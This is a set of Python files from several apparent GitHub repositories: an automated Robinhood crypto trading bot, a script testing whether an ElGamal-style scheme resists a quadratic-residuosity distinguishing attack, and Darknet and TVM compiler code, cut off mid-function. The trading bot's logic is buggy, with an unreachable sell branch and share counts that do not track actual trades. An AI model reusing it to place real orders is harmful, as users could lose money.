# Each 5 minutes passed, checks if difference is larger than a manually set percentage, progressively increasing the difference boundary. # If the initial starting price when the program started multiplied by a set percentage, is greater than the current price AND # the current price is lower than the average cost minus a set percentage, then buy Shares2Buy amount in dollars. # If Bought, updates the average_cost and num_shares. if counter1 == 6: if float(SE3P[0])*1.005 > float(r) and float(r) < float(average_cost-float(average_cost*float(0.015))): # instruction step (3) fill in amount in dollars in place of float(20) Shares2Buy = math.floor(float(20) / float(r)-1) crypto_BUY(ticker, Shares2Buy) print("bought:", r) tempval = average_cost*num_shares average_cost = tempval average_cost += float(r) num_shares += 1 average_cost /= float(num_shares) print("avg cost:" + str(average_cost)) elif counter1 == 5: if float(SE3P[0])*1.0045 > float(r) and float(r) < float(average_cost-float(average_cost*float(0.015))): # instruction step (3) fill in amount in dollars in place of float(20) Shares2Buy = math.floor(float(20) / float(r)-1) crypto_BUY(ticker, Shares2Buy) print("bought:", r) tempval = average_cost*num_shares average_cost = tempval average_cost += float(r) num_shares += 1 average_cost /= float(num_shares) print("avg cost:" + str(average_cost)) elif counter1 == 4: if float(SE3P[0])*1.004 > float(r) and float(r) < float(average_cost-float(average_cost*float(0.015))): # instruction step (3) fill in amount in dollars in place of float(20) Shares2Buy = math.floor(float(20) / float(r)-1) crypto_BUY(ticker, Shares2Buy) print("bought:", r) tempval = average_cost*num_shares average_cost = tempval average_cost += float(r) num_shares += 1 average_cost /= float(num_shares) print("avg cost:" + str(average_cost)) elif counter1 == 3: if float(SE3P[0])*1.0035 > float(r) and float(r) < float(average_cost-float(average_cost*float(0.015))): # instruction step (3) fill in amount in dollars in place of float(20) Shares2Buy = math.floor(float(20) / float(r)-1) crypto_BUY(ticker, Shares2Buy) print("bought:", r) tempval = average_cost*num_shares average_cost = tempval average_cost += float(r) num_shares += 1 average_cost /= float(num_shares) print("avg cost:" + str(average_cost)) elif counter1 == 2: if float(SE3P[0])*1.003 > float(r) and float(r) < float(average_cost-float(average_cost*float(0.015))): # instruction step (3) fill in amount in dollars in place of float(20) Shares2Buy = math.floor(float(20) / float(r)-1) crypto_BUY(ticker, Shares2Buy) print("bought:", r) tempval = average_cost*num_shares average_cost = tempval average_cost += float(r) num_shares += 1 average_cost /= float(num_shares) print("avg cost:" + str(average_cost)) #BUY # if first price is < than 2nd # if it has been 30 minutes or more since the start of the program if counter1 >= 6: # For each 5 minutes, compare the current price to each index of the list in order starting with [1]-[5] since the current price would be [0]. # Each 5 minutes passed, checks if difference is larger than a manually set percentage, progressively increasing the difference boundary. # If the current price multiplied by a set percentage, is less than one of the indices AND # the current price is lower than the average cost minus a set percentage, then buy Shares2Buy amount in dollars. # If Bought, updates the average_cost and num_shares. if float(r)*1.004 < float(SE3P[0]) and float(r) < float(average_cost-float(average_cost*float(0.015))): # instruction step (3) fill in amount in dollars in place of float(20) Shares2Buy = math.floor(float(20) / float(r)-1) crypto_BUY(ticker, Shares2Buy) print("bought:", r) tempval = average_cost*num_shares average_cost = tempval average_cost += float(r) num_shares += 1 average_cost /= float(num_shares) print("avg cost:" + str(average_cost)) elif float(r)*1.005 < float(SE3P[1]) and float(r) < float(average_cost-float(average_cost*float(0.015))): # instruction step (3) fill in amount in dollars in place of float(20) Shares2Buy = math.floor(float(20) / float(r)-1) crypto_BUY(ticker, Shares2Buy) print("bought:", r) tempval = average_cost*num_shares average_cost = tempval average_cost += float(r) num_shares += 1 average_cost /= float(num_shares) print("avg cost:" + str(average_cost)) elif float(r)*1.006 < float(SE3P[2]) and float(r) < float(average_cost-float(average_cost*float(0.015))): # instruction step (3) fill in amount in dollars in place of float(20) Shares2Buy = math.floor(float(20) / float(r)-1) crypto_BUY(ticker, Shares2Buy) print("bought:", r) tempval = average_cost*num_shares average_cost = tempval average_cost += float(r) num_shares += 1 average_cost /= float(num_shares) print("avg cost:" + str(average_cost)) elif float(r)*1.007 < float(SE3P[3]) and float(r) < float(average_cost-float(average_cost*float(0.015))): # instruction step (3) fill in amount in dollars in place of float(20) Shares2Buy = math.floor(float(20) / float(r)-1) crypto_BUY(ticker, Shares2Buy) print("bought:", r) tempval = average_cost*num_shares average_cost = tempval average_cost += float(r) num_shares += 1 average_cost /= float(num_shares) print("avg cost:" + str(average_cost)) elif float(r)*1.008 < float(SE3P[4]) and float(r) < float(average_cost-float(average_cost*float(0.015))): # instruction step (3) fill in amount in dollars in place of float(20) Shares2Buy = math.floor(float(20) / float(r)-1) crypto_BUY(ticker, Shares2Buy) print("bought:", r) tempval = average_cost*num_shares average_cost = tempval average_cost += float(r) num_shares += 1 average_cost /= float(num_shares) print("avg cost:" + str(average_cost)) elif float(r)*1.01 < float(SE3P[5]) and float(r) < float(average_cost-float(average_cost*float(0.015))): # instruction step (3) fill in amount in dollars in place of float(20) Shares2Buy = math.floor(float(20) / float(r)-1) crypto_BUY(ticker, Shares2Buy) print("bought:", r) tempval = average_cost*num_shares average_cost = tempval average_cost += float(r) num_shares += 1 average_cost /= float(num_shares) print("avg cost:" + str(average_cost)) #SELL # if it's been less than 30 minutes since the start of the program if counter2 < 6: # For each 5 minutes, compare the inital price at the start of the program to the current price. # Each 5 minutes passed, checks if difference is larger than a manually set percentage, progressively increasing the difference boundary. # If the initial starting price when the program started multiplied by a set percentage, is less than the current price AND # the current price is greater than the average cost plus a set percentage, then sell Shares2Sell amount in dollars. # If Sold, updates the average_cost and num_shares. if counter2 == 6: if float(SE3P[0])*1.0115 < float(r) and float(r) > float(average_cost+float(average_cost*float(0.04))): # instruction step (4) fill in amount in dollars in place of float(100) Shares2Sell = math.floor(float(40) / float(r)+1) crypto_SELL(ticker, Shares2Sell) print("sold:", r) print("avg cost:", average_cost) num_shares -= 2.0 elif counter2 == 5: if float(SE3P[0])*1.0105 < float(r) and float(r) > float(average_cost+float(average_cost*float(0.04))): # instruction step (4) fill in amount in dollars in place of float(100) Shares2Sell = math.floor(float(40) / float(r)+1) crypto_SELL(ticker, Shares2Sell) print("sold:", r) print("avg cost:", average_cost) num_shares -= 2.0 elif counter2 == 4: if float(SE3P[0])*1.0095 < float(r) and float(r) > float(average_cost+float(average_cost*float(0.04))): # instruction step (4) fill in amount in dollars in place of float(100) Shares2Sell = math.floor(float(40) / float(r)+1) crypto_SELL(ticker, Shares2Sell) print("sold:", r) print("avg cost:", average_cost) num_shares -= 2.0 elif counter2 == 3: if float(SE3P[0])*1.0085 < float(r) and float(r) > float(average_cost+float(average_cost*float(0.04))): # instruction step (4) fill in amount in dollars in place of float(100) Shares2Sell = math.floor(float(40) / float(r)+1) crypto_SELL(ticker, Shares2Sell) print("sold:", r) print("avg cost:", average_cost) num_shares -= 2.0 elif counter2 == 2: if float(SE3P[0])*1.0075 < float(r) and float(r) > float(average_cost+float(average_cost*float(0.04))): # instruction step (4) fill in amount in dollars in place of float(100) Shares2Sell = math.floor(float(40) / float(r)+1) crypto_SELL(ticker, Shares2Sell) print("sold:", r) print("avg cost:", average_cost) num_shares -= 2.0 #SELL # if it has been 30 minutes or more since the start of the program if counter2 >= 6: # For each 5 minutes, compare the current price to each index of the list in order starting with [1]-[5] since the current price would be [0]. # Each 5 minutes passed, checks if difference is larger than a manually set percentage, progressively increasing the difference boundary. # If the current price multiplied by a set percentage, is greater than one of the indices AND # the current price is greater than the average cost plus a set percentage, then sell Shares2Sell amount in dollars. # If Sold, updates the average_cost and num_shares. if float(r)*0.996 > float(SE3P[0]) and float(r) > float(average_cost+float(average_cost*float(0.04))): # instruction step (4) fill in amount in dollars in place of float(100) Shares2Sell = math.floor(float(40) / float(r)+1) crypto_SELL(ticker, Shares2Sell) print("sold:", r) print("avg cost:", average_cost) num_shares -= 2.0 elif float(r)*0.995 > float(SE3P[1]) and float(r) > float(average_cost+float(average_cost*float(0.04))): # instruction step (4) fill in amount in dollars in place of float(100) Shares2Sell = math.floor(float(40) / float(r)+1) crypto_SELL(ticker, Shares2Sell) print("sold:", r) print("avg cost:", average_cost) num_shares -= 2.0 elif float(r)*0.993 > float(SE3P[2]) and float(r) > float(average_cost+float(average_cost*float(0.04))): # instruction step (4) fill in amount in dollars in place of float(100) Shares2Sell = math.floor(float(40) / float(r)+1) crypto_SELL(ticker, Shares2Sell) print("sold:", r) print("avg cost:", average_cost) num_shares -= 2.0 elif float(r)*0.991 > float(SE3P[3]) and float(r) > float(average_cost+float(average_cost*float(0.04))): # instruction step (4) fill in amount in dollars in place of float(100) Shares2Sell = math.floor(float(40) / float(r)+1) crypto_SELL(ticker, Shares2Sell) print("sold:", r) print("avg cost:", average_cost) num_shares -= 2.0 elif float(r)*0.989 > float(SE3P[4]) and float(r) > float(average_cost+float(average_cost*float(0.04))): # instruction step (4) fill in amount in dollars in place of float(100) Shares2Sell = math.floor(float(40) / float(r)+1) crypto_SELL(ticker, Shares2Sell) print("sold:", r) print("avg cost:", average_cost) num_shares -= 2.0 elif float(r)*0.987 > float(SE3P[5]) and float(r) > float(average_cost+float(average_cost*float(0.04))): # instruction step (4) fill in amount in dollars in place of float(100) Shares2Sell = math.floor(float(40) / float(r)+1) crypto_SELL(ticker, Shares2Sell) print("sold:", r) print("avg cost:", average_cost) num_shares -= 2.0 # Keeps track of counter print("c1:" + str(counter1)) print("c2:" + str(counter2)) counter1 += 1 counter2 += 1 if num_shares <= 0: sys.exit() # calls scheduler every 5 minutes s.enter(300, 1, run, (sc,)) # Functions to buy and sell crypto currency def crypto_BUY(ticker, amountD): r = robin_stocks.orders.order_buy_crypto_by_quantity(ticker, amountD) print(r) def crypto_SELL(ticker, amountD): r = robin_stocks.orders.order_sell_crypto_by_quantity(ticker, amountD) print(r) s.enter(1, 1, run, (s,)) s.run() ```
{ "source": "0x00Jeff/ShitCrypt", "score": 3 }
#### File: 0x00Jeff/ShitCrypt/ShitCrypt.py ```python from subprocess import call import random import math def isQR(x, p): q = (p - 1) / 2 return pow(x, q, p) def findQNR(p): r = random.randint(1, p - 1) while isQR(r, p) == 1: r = random.randint(1, p - 1) return r def findQR(p): r = random.randint(1, p - 1) return pow(r, 2, p) print ("Generating the key...") call(["gcc", "-o", "keygen", "keygen.c", "-lgcrypt"]) call(["gcc", "-o", "encrypt", "encrypt.c", "-lgcrypt"]) call("./keygen") p = int(open("./p").read(), 16) y = int(open("./y").read(), 16) wrong = 0 runs = 1000 print ("Running the experiment...") for i in xrange(runs): pk = y plaintexts = dict() plaintexts[0] = findQNR(p) plaintexts[1] = findQR(p) challenge_bit = random.randint(0,1) challenge_string = hex(plaintexts[challenge_bit]) challenge_string = challenge_string[2:-1] challenge_string = challenge_string.zfill(256) challenge_string = challenge_string.upper() open("./pt", "wb").write(challenge_string) call("./encrypt") ct_a = int(open("./ct_a").read(), 16) ct_b = int(open("./ct_b").read(), 16) output = -1 if ((isQR(pk, p) == 1) or (isQR(ct_a, p) == 1)): if isQR(ct_b, p) == 1: output = 1 else: output = 0 else: if isQR(ct_b, p) == 1: output = 0 else: output = 1 if output != challenge_bit: wrong = wrong + 1 print ("Number of times the guess was wrong (should be 50% if this shit is secure):"), wrong, "/", runs ```
{ "source": "0x00-pl/kendryte-model-compiler", "score": 2 }
#### File: darknet/D2T_lib/net.py ```python import copy import re from . import bwidth from . import layers __parse_layers__ = { 'depthwise_convolutional': layers.dw_convolutional_layer, 'convolutional': layers.convolutional_layer, 'connected': None, 'maxpool': layers.maxpooling_layer, 'avgpool': layers.avgpooling_layer, 'route': layers.route_layer, 'softmax': None } __unit_size__ = { 'bit': 8, 'byte': 1, 'KB': 1.0 / 1024, 'MB': 1.0 / 1024 / 1024, 'GB': 1.0 / 1024 / 1024 / 1024 } __empty_info__ = re.compile(' ') """ virtual class for only storing the structure of the network without param. interference features: - import .cfg -> virtual net - export self -> .cfg - export self -> tensorflow code (module like) - statistics of parameters """ class net(object): def __init__(self, name, scope=None, dtype='float32'): self.name = name self.scope = scope self.dtype = dtype self.layers = dict() # input size self.input_size = { 'batch': 1, 'size': [0], } # net route : to be used in the future, now as sequence self.route = [] # statistics table self.statistics = {} def layers_from_cfg(self, cfg_path): with open(cfg_path) as F: # skip empty lines contents = list(l.strip() for l in filter(lambda x: True if len(x) > 1 else False, F.readlines())) # get blocks for parsing block_st = -1 line_id = 0 block_id = -1 for l in contents: if l[0] == '[': # find block header if block_st > -1: # return kwargs for construct layer self.parse_block(contents[block_st:line_id], copy.copy(block_id)) block_id += 1 block_st = line_id line_id += 1 self.match_between_layers() # sequence layers # match in/out def match_between_layers(self): prev_in_channel = self.input_size['size'][-1] for k in self.route: _layer = self.layers[k] _layer.num_in = prev_in_channel if _layer.num_out == 0: _layer.num_out = prev_in_channel elif _layer.num_out == -1: # route layer _layer.num_out = 0 for prevl in range(len(_layer.route_layers)): _jump = _layer.route_layers[prevl] refer_l = self.route[k + _jump if _jump < 0 else _jump] _layer.num_out += self.layers[refer_l].num_out _layer.route_layers[prevl] = self.layers[refer_l].name prev_in_channel = _layer.num_out print(k, _layer.type, ' | ', _layer.num_in, '->', _layer.num_out) # split block lines into dictionary def __split_block_opt__(self, block_lines): global __empty_info__ kv_split = list(__empty_info__.sub('', l).split('=') for l in block_lines) kv_split = filter(lambda x: len(x) == 2, kv_split) # filtering invalid line return {k[0]: k[1] for k in kv_split} def parse_block(self, lines, index): header = lines[0] # get layer type if header == '[net]': net_opt = self.__split_block_opt__(lines[1:]) self.input_size['batch'] = (int)(net_opt['batch']) self.input_size['size'] = [ (int)(net_opt['width']), (int)(net_opt['height']), (int)(net_opt['channels']) ] elif header == '[region]': pass elif header[0] == '[': default_name = header[1:-1] default_scope = None initializer = __parse_layers__[default_name] if initializer: # use the same keys as cfg file layer_opt = self.__split_block_opt__(lines[1:]) layer_opt['#TYPE'] = default_name if '#NAME' not in layer_opt: layer_opt['#NAME'] = str(index) if '#SCOPE' not in layer_opt: layer_opt['#SCOPE'] = default_scope self.layers[index] = initializer(dtype=self.dtype, kwargs=layer_opt) self.layers[layer_opt['#NAME']] = self.layers[index] self.route.append(index) else: print('unsupported layer type: %s' % (header)) def statistcs_size(self, unit='MB', print_out=False, export_csv_as=None): total_count = 0.0 self.statistics['layer_size'] = [] # may to be appled with Pandas in the future # index | # param count me | # param size (:unit) me | # param count accumulated | # param size (:unit) accumulated | # ractions for k in self.route: _layer = self.layers[k] my_size = _layer.my_size(flag='count') p_count = sum(my_size.values()) total_count += p_count self.statistics['layer_size'].append([ str(k), _layer.type, p_count, p_count * __unit_size__[unit] * bwidth.__bwidth__[self.dtype], total_count, total_count * __unit_size__[unit] * bwidth.__bwidth__[self.dtype], None ]) # compute fractions for l in self.statistics['layer_size']: l[-1] = (float)(l[2]) / (float)(total_count) # summary self.statistics['summary'] = ([ total_count, total_count * __unit_size__[unit] * bwidth.__bwidth__[self.dtype] ]) """ table = DF(columns=['index', 'layer type', 'param count','param size(%s)'%(unit), 'acc. count', 'acc. size(%s)'%(unit), 'fraction(%)'], data=self.statistics['layer_size']) # formatting if print_out or export_csv_as: print_table = deepcopy(table) print_table['index'] = print_table['index'].map(lambda x:'<%s>'%x) print_table['param count'] = print_table['param count'].map(lambda x: '%i'%x) print_table['acc. count'] = print_table['acc. count'].map(lambda x: '%i' % x) print_table['fraction(%)'] = print_table['fraction(%)'].map(lambda x: '%.2f%%'%(x*100.0)) self.print_table = print_table if print_out: print('Data type: ', self.dtype) print(print_table) print('summary:\ntotal count: %i\ntotal size: %.4f %s'%( self.statistics['summary'][0], self.statistics['summary'][1], unit )) if export_csv_as is not None: print_table.to_csv(export_csv_as,index=False) """ ```
{ "source": "0x00-pl/tvm", "score": 2 }
#### File: relay/backend/profiler_vm.py ```python import tvm from . import vm, _vm def _update_target(target): target = target if target else tvm.target.current_target() if target is None: raise ValueError("Target is not set in env or passed as argument.") tgts = {} if isinstance(target, (str, tvm.target.Target)): dev_type = tvm.expr.IntImm("int32", tvm.nd.context(str(target)).device_type) tgts[dev_type] = tvm.target.create(target) elif isinstance(target, dict): for dev, tgt in target.items(): dev_type = tvm.expr.IntImm("int32", tvm.nd.context(dev).device_type) tgts[dev_type] = tvm.target.create(tgt) else: raise TypeError("target is expected to be str, tvm.target.Target, " + "or dict of str to str/tvm.target.Target, but received " + "{}".format(type(target))) return tgts class VMCompilerProfiler(vm.VMCompiler): """Build Relay module to run on VM runtime.""" def __init__(self): super().__init__() self.mod = _vm._VMCompilerProfiler() self._compile = self.mod["compile"] self._get_vm = self.mod["get_vm"] def compile(self, mod, target=None, target_host=None): """ Parameters ---------- mod : relay.Module The Relay module to build. target : str, :any:`tvm.target.Target`, or dict of str(i.e. device/context name) to str/tvm.target.Target, optional For heterogeneous compilation, it is a dictionary indicating context to target mapping. For homogeneous compilation, it is a build target. target_host : str or :any:`tvm.target.Target`, optional Host compilation target, if target is device. When TVM compiles device specific program such as CUDA, we also need host(CPU) side code to interact with the driver to setup the dimensions and parameters correctly. target_host is used to specify the host side codegen target. By default, llvm is used if it is enabled, otherwise a stackvm intepreter is used. Returns ------- vm : VirtualMachineProfiler The profile VM runtime. """ target = _update_target(target) self._compile(mod, target, target_host) return VirtualMachineProfiler(self._get_vm()) class VirtualMachineProfiler(vm.VirtualMachine): """Relay profile VM runtime.""" def __init__(self, mod): super().__init__(mod) self._get_stat = self.mod["get_stat"] def get_stat(self): return self._get_stat() ``` #### File: tvm/relay/_parser.py ```python from __future__ import absolute_import import sys from ast import literal_eval from typing import Any, Deque, Dict, List, Optional, TypeVar, Tuple, Union from collections import deque import tvm from . import module from .base import Span, SourceName from . import adt from . import expr from . import ty from . import op PYTHON_VERSION = sys.version_info.major try: from .grammar.py3.RelayVisitor import RelayVisitor from .grammar.py3.RelayParser import RelayParser from .grammar.py3.RelayLexer import RelayLexer except ImportError: raise Exception("Couldn't find ANTLR parser. Try building with USE_ANTLR=ON.") try: from antlr4 import InputStream, CommonTokenStream from antlr4.error.ErrorListener import ErrorListener except ImportError: raise Exception("Couldn't find ANTLR runtime." + "Try running `pip{version} install antlr4-python{version}-runtime`." .format(version=PYTHON_VERSION)) sys.setrecursionlimit(10000) class ParseError(Exception): """Exception type for parse errors.""" def __init__(self, message: str) -> None: super(ParseError, self).__init__() self.message = message def __repr__(self): return "ParseError({})".format(self.message) def __str__(self): return repr(self) class OpWrapper: """Overload the __call__ for op.""" pass class ExprOp(OpWrapper): """Call an expr. The default, but does not handle attrs well.""" def __init__(self, operator): self.operator = operator def __call__(self, args, attrs, type_args): try: return expr.Call(self.operator, args, attrs, type_args) except Exception: raise Exception("Operator {} is not registered. It's attributes are {}" .format(self.operator, attrs)) class FuncOp(OpWrapper): """Convert the attrs, call the python function with the attrs passed in as keyword arguments. Tvm should provide this in the future, as this is pretty similar to what op.get is providing. """ def __init__(self, operator): self.operator = operator def convert(self, v): if isinstance(v, tuple): return tuple([self.convert(x) for x in v]) if isinstance(v, expr.Constant): return v.data.asnumpy().item() if isinstance(v, str): return v raise Exception(v) def __call__(self, args, attrs, type_args): if attrs is None: attrs = {} x = self.operator(*args, **{k: self.convert(v) for k, v in attrs.items()}) if isinstance(x, expr.TupleWrapper): x = x.astuple() return x BINARY_OPS = { RelayParser.MUL: op.multiply, RelayParser.DIV: op.divide, RelayParser.ADD: op.add, RelayParser.SUB: op.subtract, RelayParser.LT: op.less, RelayParser.GT: op.greater, RelayParser.LE: op.less_equal, RelayParser.GE: op.greater_equal, RelayParser.EQ: op.equal, RelayParser.NE: op.not_equal, } FUNC_OPS = { "nn.conv2d": op.nn.conv2d, "nn.batch_norm": op.nn.batch_norm, "nn.dense": op.nn.dense, "nn.bias_add": op.nn.bias_add, "nn.max_pool2d": op.nn.max_pool2d, "nn.global_max_pool2d": op.nn.global_max_pool2d, "nn.avg_pool2d": op.nn.avg_pool2d, "nn.global_avg_pool2d": op.nn.global_avg_pool2d, "nn.softmax": op.nn.softmax, "reshape": op.reshape, "nn.conv2d_transpose": op.nn.conv2d_transpose, "concatenate": op.concatenate, "nn.dropout": op.nn.dropout_raw, "zeros": op.zeros, "split": op.split, "cast": op.cast } TYPE_PREFIXES = [ "int", "uint", "float", "bool", ] T = TypeVar("T") Scope = Deque[Tuple[str, T]] Scopes = Deque[Scope[T]] def lookup(scopes: Scopes[T], name: str) -> Optional[T]: """Look up `name` in `scopes`.""" for scope in scopes: for key, val in scope: if key == name: return val return None def spanify(f): """A decorator which attaches span information to the value returned by calling `f`. Intended for use with the below AST visiting methods. The idea is that after we do the work of constructing the AST we attach Span information. """ def _wrapper(*args, **kwargs): # Assumes 0th arg is self and gets source_name from object. sn = args[0].source_name # Assumes 1st arg is an ANTLR parser context. ctx = args[1] ast = f(*args, **kwargs) line, col = ctx.getSourceInterval() sp = Span(sn, line, col) if isinstance(ast, tvm.relay.expr.TupleWrapper): ast = ast.astuple() ast.set_span(sp) return ast return _wrapper # TODO(@jmp): Use https://stackoverflow.com/q/13889941 # to figure out how to get ANTLR4 to be more unhappy about syntax errors class ParseTreeToRelayIR(RelayVisitor): """Parse Relay text format into Relay IR.""" def __init__(self, source_name: str) -> None: self.source_name = source_name self.module = module.Module({}) # type: module.Module # Adding an empty scope allows naked lets without pain. self.var_scopes = deque([deque()]) # type: Scopes[expr.Var] self.global_vars = {} # type: Scope[expr.GlobalVar] self.type_var_scopes = deque([deque()]) # type: Scopes[ty.TypeVar] self.global_type_vars = {} # type: Scope[expr.GlobalVar] self.graph_expr = [] # type: List[expr.Expr] super(ParseTreeToRelayIR, self).__init__() def enter_var_scope(self) -> None: """Enter a new Var scope so it can be popped off later.""" self.var_scopes.appendleft(deque()) def exit_var_scope(self) -> Scope[expr.Var]: """Pop off the current Var scope and return it.""" return self.var_scopes.popleft() def mk_var(self, name: str, typ: ty.Type = None): """Create a new Var and add it to the Var scope.""" var = expr.Var(name, typ) self.var_scopes[0].appendleft((name, var)) return var def mk_global_var(self, name: str) -> expr.GlobalVar: """Create a new GlobalVar and add it to the GlobalVar scope.""" if name in self.global_vars: raise ParseError(f"duplicate global var \"{name}\"") var = expr.GlobalVar(name) self.global_vars[name] = var return var def enter_type_param_scope(self) -> None: """Enter a new TypeVar scope so it can be popped off later.""" self.type_var_scopes.appendleft(deque()) def exit_type_param_scope(self) -> Scope[ty.TypeVar]: """Pop off the current TypeVar scope and return it.""" return self.type_var_scopes.popleft() def mk_typ(self, name: str, kind: ty.Kind) -> ty.TypeVar: """Create a new TypeVar and add it to the TypeVar scope.""" typ = ty.TypeVar(name, kind) self.type_var_scopes[0].appendleft((name, typ)) return typ def mk_global_typ_var(self, name, kind): # (str, ty.Kind) -> ty.GlobalTypeVar """Create a new TypeVar and add it to the TypeVar scope.""" typ = ty.GlobalTypeVar(name, kind) self._check_existing_typ_expr(name, typ) self.global_type_vars[name] = typ return typ # TODO: rethink whether we should have type constructors mixed with type vars. def mk_global_typ_cons(self, name, cons): self._check_existing_typ_expr(name, cons) self.global_type_vars[name] = cons def _check_existing_typ_expr(self, name, new_expr): if name in self.global_type_vars: new_typ_name = self._type_expr_name(new_expr) existing_typ_name = self._type_expr_name(self.global_type_vars[name]) raise ParseError( f"{new_typ_name} `{name}` conflicts with existing {existing_typ_name}") def _type_expr_name(self, e): if isinstance(e, adt.Constructor): return f"`{e.belong_to.var.name}` ADT constructor" elif isinstance(e, ty.GlobalTypeVar): if e.kind == ty.Kind.AdtHandle: return f"ADT definition" return "function definition" def visitProjection(self, ctx): return expr.TupleGetItem(self.visit(ctx.expr()), self.visit(ctx.NAT())) def visitTerminal(self, node) -> Union[expr.Expr, int, float]: """Visit lexer tokens that aren't ignored or visited by other functions.""" node_type = node.getSymbol().type node_text = node.getText() if node_type == RelayLexer.NAT: return int(node_text) if node_type == RelayLexer.FLOAT: return float(node_text[:-1]) if node_type == RelayLexer.BOOL_LIT: if node_text == "True": return True if node_text == "False": return False raise ParseError("unrecognized BOOL_LIT: `{}`".format(node_text)) if node_type == RelayLexer.QUOTED_STRING: return literal_eval(node_text) raise ParseError(f"unhandled terminal \"{node_text}\" of type `{node_type}`") def visitGeneralIdent(self, ctx): name = ctx.getText() # Look through all type prefixes for a match. for type_prefix in TYPE_PREFIXES: if name.startswith(type_prefix): return ty.scalar_type(name) # Next, look it up in the local then global type params. type_param = lookup(self.type_var_scopes, name) if type_param is None: type_param = self.global_type_vars.get(name, None) if type_param is not None: return type_param # Check if it's an operator. op_name = ".".join([name.getText() for name in ctx.CNAME()]) if op_name in FUNC_OPS: return FuncOp(FUNC_OPS[op_name]) return ExprOp(op.get(op_name)) def visitGlobalVar(self, ctx): var_name = ctx.CNAME().getText() global_var = self.global_vars.get(var_name, None) if global_var is None: raise ParseError(f"unbound global var `{var_name}`") return global_var def visitLocalVar(self, ctx): var_name = ctx.CNAME().getText() local_var = lookup(self.var_scopes, var_name) if local_var is None: raise ParseError(f"unbound local var `{var_name}`") return local_var def visitGraphVar(self, ctx): return self.graph_expr[int(ctx.NAT().getText())] def visit_list(self, ctx_list) -> List[Any]: """"Visit a list of contexts.""" # type: RelayParser.ContextParserRuleContext assert isinstance(ctx_list, list) return [self.visit(ctx) for ctx in ctx_list] def getTypeExpr(self, ctx) -> Optional[ty.Type]: """Return a (possibly None) Relay type.""" # type: : Optional[RelayParser.Type_Context] if ctx is None: return None return self.visit(ctx) def visitProg(self, ctx: RelayParser.ProgContext) -> Union[expr.Expr, module.Module]: self.meta = None if ctx.METADATA(): header, data = str(ctx.METADATA()).split("\n", 1) assert header == "METADATA:" self.meta = tvm.load_json(data) if ctx.defn(): self.visit_list(ctx.defn()) return self.module if ctx.expr(): return self.visit(ctx.expr()) return self.module # Exprs def visitOpIdent(self, ctx) -> op.Op: op_name = ".".join([name.getText() for name in ctx.CNAME()]) if op_name in FUNC_OPS: return FuncOp(FUNC_OPS[op_name]) return ExprOp(op.get(op_name)) # pass through def visitParen(self, ctx: RelayParser.ParenContext) -> expr.Expr: return self.visit(ctx.expr()) # pass through def visitBody(self, ctx: RelayParser.BodyContext) -> expr.Expr: return self.visit(ctx.expr()) def visitScalarFloat(self, ctx: RelayParser.ScalarFloatContext) -> expr.Constant: return expr.const(self.visit(ctx.FLOAT())) def visitScalarInt(self, ctx: RelayParser.ScalarIntContext) -> expr.Constant: return expr.const(self.visit(ctx.NAT())) def visitScalarBool(self, ctx: RelayParser.ScalarBoolContext) -> expr.Constant: return expr.const(self.visit(ctx.BOOL_LIT())) def visitNeg(self, ctx: RelayParser.NegContext) -> Union[expr.Constant, expr.Call]: val = self.visit(ctx.expr()) if isinstance(val, expr.Constant) and val.data.asnumpy().ndim == 0: # fold Neg in for scalars return expr.const(-val.data.asnumpy().item()) return op.negative(val) def visitTuple(self, ctx: RelayParser.TupleContext) -> expr.Tuple: tup = self.visit_list(ctx.expr()) return expr.Tuple(tup) def visitLet(self, ctx: RelayParser.LetContext) -> expr.Let: """Desugar various sequence constructs to Relay Let nodes.""" if ctx.var() is None: # anonymous identity ident = "_" typ = None var = self.mk_var(ident, typ) else: var = self.visitVar(ctx.var()) self.enter_var_scope() value = self.visit(ctx.expr(0)) self.exit_var_scope() body = self.visit(ctx.expr(1)) return expr.Let(var, value, body) def visitBinOp(self, ctx: RelayParser.BinOpContext) -> expr.Call: """Desugar binary operators.""" arg0, arg1 = self.visit_list(ctx.expr()) relay_op = BINARY_OPS.get(ctx.op.type) if relay_op is None: raise ParseError("unimplemented binary op.") return relay_op(arg0, arg1) @spanify def visitVar(self, ctx: RelayParser.VarContext) -> expr.Var: """Visit a single variable.""" ident = ctx.localVar() if ident is None: raise ParseError("only local ids may be used in vars.") typeExpr = self.getTypeExpr(ctx.typeExpr()) return self.mk_var(ident.getText()[1:], typeExpr) def visitVarList(self, ctx: RelayParser.VarListContext) -> List[expr.Var]: return self.visit_list(ctx.var()) # TODO: support a larger class of values than just Relay exprs def visitAttr(self, ctx: RelayParser.AttrContext) -> Tuple[str, expr.Expr]: return (ctx.CNAME().getText(), self.visit(ctx.expr())) def visitArgNoAttr(self, ctx: RelayParser.ArgNoAttrContext): return (self.visit_list(ctx.varList().var()), None) def visitAttrSeq(self, ctx: RelayParser.AttrSeqContext) -> Dict[str, expr.Expr]: return dict(self.visit_list(ctx.attr())) def visitArgWithAttr(self, ctx: RelayParser.AttrSeqContext) \ -> Tuple[List[expr.Var], Dict[str, expr.Expr]]: return (self.visit_list(ctx.var()), self.visitAttrSeq(ctx.attrSeq())) def visitArgList(self, ctx: RelayParser.ArgListContext) \ -> Tuple[Optional[List[expr.Var]], Optional[Dict[str, expr.Expr]]]: var_list = self.visit(ctx.varList()) if ctx.varList() else None attr_list = self.visit(ctx.attrList()) if ctx.attrList() else None return (var_list, attr_list) def visitMeta(self, ctx: RelayParser.MetaContext): type_key = str(ctx.CNAME()) index = int(self.visit(ctx.NAT())) return self.meta[type_key][index] def mk_func( self, ctx: Union[RelayParser.FuncContext, RelayParser.DefnContext]) \ -> expr.Function: """Construct a function from either a Func or Defn.""" # Enter var scope early to put params in scope. self.enter_var_scope() # Capture type params in params. self.enter_type_param_scope() type_params = ctx.typeParamList() if type_params is not None: type_params = type_params.generalIdent() assert type_params for ty_param in type_params: name = ty_param.getText() self.mk_typ(name, ty.Kind.Type) var_list, attr_list = self.visit(ctx.argList()) if var_list is None: var_list = [] ret_type = self.getTypeExpr(ctx.typeExpr()) body = self.visit(ctx.body()) # NB(@jroesch): you must stay in the type parameter scope until # after you exit the body, you can reference the type parameters # of your parent scopes. type_params = list(self.exit_type_param_scope()) if type_params: _, type_params = zip(*type_params) self.exit_var_scope() attrs = tvm.make.node("DictAttrs", **attr_list) if attr_list is not None else None return expr.Function(var_list, body, ret_type, type_params, attrs) @spanify def visitFunc(self, ctx: RelayParser.FuncContext) -> expr.Function: return self.mk_func(ctx) # TODO: how to set spans for definitions? # @spanify def visitFuncDefn(self, ctx: RelayParser.DefnContext) -> None: ident_name = ctx.globalVar().getText()[1:] ident = 